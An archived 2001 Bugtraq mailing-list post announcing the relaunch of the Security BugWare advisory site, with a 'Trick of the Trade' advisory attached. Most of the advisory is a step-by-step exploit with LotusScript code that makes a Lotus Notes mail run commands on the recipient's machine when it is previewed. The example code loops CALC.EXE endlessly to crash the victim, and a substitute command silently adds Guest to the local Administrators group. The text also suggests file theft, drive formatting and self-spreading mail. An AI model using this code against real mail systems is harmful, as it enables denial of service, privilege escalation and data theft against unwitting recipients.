[22939] in bugtraq
Security BugWare Advisory
daemon@ATHENA.MIT.EDU (Yann)
Mon Oct 22 11:15:18 2001
Date: Mon, 22 Oct 2001 17:06:21 +0200
To: crv@oliver.efri.hr, bugtraq@securityfocus.com,
submissions@packetstormsecurity.org, info@razor.bindview.com
Message-ID: <20011022170621.A4302@bunker.freexion.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
From: irib@bunker.freexion.net (Yann)
----[www.securitybugware.org]----
< A D V I S O R I E S >
Dear World,
From 1996 to 9th Sep 2001, Hrvoje Crvelin maintained the most explicit website
about bugs, exploits, and solutions. He decided to stop this project.
As there is no such resource on the web, we decided to keep this one alive.
Behind the new Security BugWare you can find a french organisation (association
loi 1901), which is a non-profit organisation. Our aim is to continue Hrvoje
job, for all people like us who need to have a centralised - and straight to
the point - bug information page.
For the better propaganda of this news, we offer you an exclusive "Trick of
the Trade" :
Whacking A Machine With Lotus Notes Mail
COMMAND
Lotus Notes Client
SYSTEMS AFFECTED
Lotus Notes Client 5 All releases Lotus Notes Client 4.6 All releases
PROBLEM
SecurityBugware team found following, as posted on www.securitybugware.org :
With a little LotusScript in your mail, you can execute all what you want on
the recipient's computer - even out of Notes.
Follow these steps :
1) Create a new mail, add recepients
2) Go to the body and click in the menu "Create..Object"
3) Select "Control" and any object you please such as "ActiveXPlugin Object"
4) In Client 4.6 right click on the object to get "Properties"
In Client 5 click on the menu the new "Applet" feature, and go to
"Properties"
then check "run the object when the document is read"
5) Then select "Edit events" : An event pane opens linked to the object
6) In the "Initialize" section Add the following code, where "My EMAIL"
is your Lotus Notes account name (if you get this part wrong, you'll
bomb yourself) :
Sub Initialize
Dim TaskId As Integer
Dim session As New NotesSession
If session.CommonUserName<>"My EMAIL" Then
Do
TaskId%=Shell("CALC.EXE",1)
Loop
End If
End Subv
7) In the "Terminate" section, do the same :
Sub Terminate
Dim TaskId As Integer
Dim session As New NotesSession
If session.CommonUserName<>"My EMAIL" Then
Do
TaskId%=Shell("CALC.EXE",1)
Loop
End If
End Subv
8) Click again on the "Initialize" section
9) Hit the "Send" button, enjoy ;-)
Your ActiveX (or other object you choosed) gets executed during the reading
of the document. If the victim "previews" his mails without opening them...
no problem, he will die anyway because a previsualisation is a reading.
In this example we just run the calculator in loop, but there can be
infinite possibilities like formating hard drives, sending emails,
replicating the script to send it to the whole adressbook, sending files,
stoling files from the victim hard drives without his notice etc...
For instance you could replace the Do .. Loop by :
TaskId%=Shell("CMD.EXE /C net localgroup " \"Administrators"\" /add guest ",1)
which adds silentely account Guest to Administrative group
In a few words, Lotus Intranet is a giant backdoor in itself.
After some checks, it seems the smtp gateway don't let LotusScript pass
through. You can only play inside your Notes interconnected domains.
SOLUTION
The only solution is to desactivate the preview, and to delete the memo
before reading it.
--
Security Bugware Team
Irib, Jitsu, Kiwi
www.securitybugware.org
